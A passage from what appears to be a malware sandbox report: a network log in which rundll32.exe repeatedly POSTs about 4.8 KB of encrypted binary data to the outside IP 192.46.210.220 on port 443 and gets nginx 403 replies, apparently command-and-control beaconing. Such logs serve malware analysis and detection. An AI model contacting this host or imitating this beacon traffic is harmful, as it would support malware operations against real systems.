10 | 192.168.2.5 | 49793 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:24 UTC | 49 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:24 UTC | 49 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:24 UTC | 54 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49800 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:28 UTC | 54 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:28 UTC | 54 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:28 UTC | 64 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:28 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49801 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:28 UTC | 59 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:28 UTC | 59 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:28 UTC | 64 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:28 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49807 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:31 UTC | 64 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:31 UTC | 64 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:32 UTC | 69 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.5 | 49809 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:32 UTC | 69 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:32 UTC | 69 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:33 UTC | 74 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:33 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.5 | 49815 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:35 UTC | 74 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:35 UTC | 74 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:36 UTC | 79 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.5 | 49817 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:36 UTC | 79 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:36 UTC | 79 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:37 UTC | 84 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:37 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.5 | 49823 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:39 UTC | 84 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:39 UTC | 84 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:40 UTC | 89 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.5 | 49825 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:40 UTC | 89 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:40 UTC | 89 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:41 UTC | 94 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:41 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.5 | 49831 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:43 UTC | 94 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:43 UTC | 94 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:44 UTC | 99 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:44 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49761 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:08 UTC | 9 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:08 UTC | 10 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:08 UTC | 14 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.5 | 49833 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:44 UTC | 99 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:44 UTC | 99 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:45 UTC | 104 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:45 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.5 | 49839 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:47 UTC | 104 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:47 UTC | 104 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:48 UTC | 109 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:48 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.5 | 49841 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:48 UTC | 109 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:48 UTC | 109 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:49 UTC | 114 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.5 | 49847 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:52 UTC | 114 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
